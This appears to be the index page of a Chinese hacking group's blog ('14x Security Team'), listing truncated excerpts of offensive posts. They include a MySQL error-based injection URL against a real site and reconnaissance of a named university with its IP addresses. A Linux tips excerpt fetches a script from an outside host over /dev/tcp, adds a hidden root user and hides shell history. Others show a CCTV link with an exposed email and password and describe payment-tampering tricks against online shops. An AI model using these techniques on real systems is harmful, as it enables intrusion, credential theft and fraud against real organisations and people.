14x Security Team

展开菜单

mysql盲注常用语句

 mysql盲注常用语句
 mysql盲注常用语句 http://www.2cto.com /tmd.php?id=352&wsid=1/**/and/**/(1,1)%3E(select/**/count(*),concat((select/**/@@version/**/),0x3a,floor(rand()*2))/**/x/**/from/**/(select/**/1/**/union/**/select/**/2)/**/a/**/group/**/by/**/x/*...

友情目标:四川师范大学文理学院

友情目标:四川师范大学文理学院
友情目标:四川师范大学文理学院未深入.简单玩玩===================================、规则:静态。。 jsp二级域名下有很多动态~~125.71.200.234http://125.71.200.244/ConfigWeb%5CIndex.aspxGUID 应包含带 4 个短划线的 32 位数(xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx)。 过滤了先分析下,不用急着C段http://zfx.scnucas.com/...

Linux渗透爱好者的小技巧

Linux渗透爱好者的小技巧
Linux渗透爱好者的小技巧1.无wget nc等下载工具时下载文件exec 5<>/dev/tcp/yese.yi.org/80 &&echo -e "GET /c.pl HTTP/1.0\n" >&5 && cat<&5 > c.pl2.Linux添加uid为0的用户useradd -o -u 0 cnbird3.bash去掉history记录export HISTSIZE=...

GET传送漏洞案例分析(CCTV为例)

GET传送漏洞案例分析(CCTV为例)
GET传送漏洞案例分析(CCTV为例)GET真的安全吗?原理你要在硕大的CCTV去找1个传送漏洞貌似很难不过我们就来想下我们就来爬下::/cntv:passwd爬到了一位:http://jishi.cntv.cn/program/gugong100/01/index.shtml?usrid2011=a61911%40gmail.com&passwd_view=%C3%DC%B4a&passwd2011=a22561081给大家讲下原理,http://jishi...

浏览器漏洞研究思路

浏览器漏洞研究思路
<form action="https://wwww.jd.com" target="1" method="post" onsubmit="setTimeout('go()', 1);" id="2"><input type="submit"></input></form><script&...

商城支付漏洞三种方法

商城支付漏洞三种方法
商城支付漏洞三种方法 商城支付漏洞三种方法1,订单数,修改为负数 -1 看看返回2,提交订单时,抓取数据包,把当前金额改成0.1元,然后提交3,大面积购买数量 如100个数量,提交时抓取数据包,把数量改为100个 配合0.1元思路,实际上你只购买了1个手机,但你缺提交了100个手机,而支付金额0.1x10=1元...